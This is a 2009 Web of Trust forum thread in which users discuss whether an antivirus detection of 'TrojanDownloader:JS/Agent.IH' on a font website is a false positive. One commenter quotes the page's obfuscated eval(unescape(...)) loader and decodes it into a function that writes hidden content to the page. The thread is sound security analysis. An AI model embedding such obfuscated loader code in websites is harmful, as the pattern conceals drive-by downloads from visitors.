Forum
Comments:
-
- on Mon 16 Nov 2009
- 08:17:38 AM UTC
:(
Sorry to hear that cyberwitch. You are very lucky, that this is your only trojan so far though! (Of course it's also good that Microsoft Security Essentials blocked it!)
Thank you for the heads up, I have rated the site red, agreed to your comment and placed my own comment on the scorecard.
Just one note, in the future please don't post LIVE malware links. Thanks! :D
-
- on Mon 16 Nov 2009
- 08:27:51 AM UTC
Live link to malware
Sorry about that, noted for next time.
-
- on Mon 16 Nov 2009
- 09:39:39 AM UTC
Should we put this at the
Should we put this at the top of the forum topic list? Not a whole 123-rule rulebook, but a few important rules like not to post live links? I've e-mailed the developers on the Support page.
-
- on Mon 16 Nov 2009
- 11:49:16 AM UTC
I think you have a false
I think you have a false positive. This is the link for the Microsoft Security Essentials page for the pop up you got: http://www.microsoft.com/security/portal/Threat/En...
It is pretty generic. I also checked Google Safe Browsing and Wepawet and they both found nothing.
-
- on Mon 16 Nov 2009
- 04:58:05 PM UTC
if u haven't already u can
if u haven't already u can run ur broswer in virtual environment w sandboxie...
http://www.sandboxie.com/ -
- on Mon 16 Nov 2009
- 10:13:30 PM UTC
This is probably the source of the detection
The following code is loaded in a javascript file on that page:
enc.js:
eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));
Decoded, that becomes:
eval(function RrRrRrRr(teaabb) {var tttmmm="";l=teaabb.length;www=hhhhffff=Math.round(l/2);if(l<2*www) hhhhffff=hhhhffff-1;for(i=0;i (anglebracket) hhhhffff;i++)tttmmm = tttmmm + teaabb.charAt(i)+ teaabb.charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb.charAt(l-1);document.write(tttmmm);};)I leave as an exercise to the reader why a website would go to such lengths to obfuscate code.
I don't believe this is a false positive.
-
- on Mon 16 Nov 2009
- 11:49:01 PM UTC
I seen many video hosting
I seen many video hosting sites do that kind of obfuscation to prevent people from easily downloading videos or hotlinking to the videos. That code does not look all that suspicious.
-
- on Mon 16 Nov 2009
- 11:50:56 PM UTC
Unmask
Parasites finds the code suspicious as well. http://www.unmaskparasites.com/security-report/?pa...
Which I stated on my scorecard comment.
-
- on Tue 17 Nov 2009
- 06:45:24 PM UTC
I've also seen this kind of code a lot
except I usually see it used by sites as a way to obfuscate driveby scripts or shellcode. It might be entirely benign in this instance, but we don't know for sure why it's there.
Could you give me a few examples of video sites that do this? I'm just curious.
I'm willing to bet the signature is based on the escaped hexadecimal for "eval(function" or "document.write" -- if it is, it probably is more overbroad than it should be. But I'm completely guessing here.
-
- on Tue 17 Nov 2009
- 01:20:25 PM UTC
Microsoft security product
Microsoft security product is famous for low F/P....
-
- on Wed 18 Nov 2009
- 11:11:52 PM UTC
MSE also found Trojan on my computer
I just downloaded Microsoft Security Essentials today and I did a full scan of my PC. MSE found on few of my several wallpapers Trojan:Win32/Jpgiframe.A I have downloaded them from ewallpapers.eu. Most of these wallpapers are ok, but you never know... So beware of this website and scan your computer frequently with several scanners. I have always used and scanned PC with MBAM, SAS and Avira, but only MSE found these threats. That's not good :(
-
- on Thu 19 Nov 2009
- 01:39:24 AM UTC
re: Trojan:Win32/Jpgiframe.A
I'm curious as to which wallpaper files were detected. Wallpaper name and resolution or better.. the direct URL would be nice. ;-)
ewallpapers.eu is green though there are a few comments about malicious files.
I've just downloaded several wallpapers at different resolutions and all are clean...
-------
WOT Services Ltd. - gives us safety through Web of Trust.
WOT Community - gives us security through unity.
Thank you all
- G7W
My first trojan
I've never had it happen before, but Microsoft Security Essentials detected and removed a javascript file that it identified as "TrojanDownloader:JS/Agent.IH" on a page I was visiting: http:// www rune-fonts co uk/fontlist php (I didn't research other pages on the site). Because I don't really feel qualified to assess this sort of threat, I wanted to mention it on the forums in case the MS software produced a false positive. (The WOT rating of the domain is green but I added a comment and rated trustworthiness in the red). Thanks.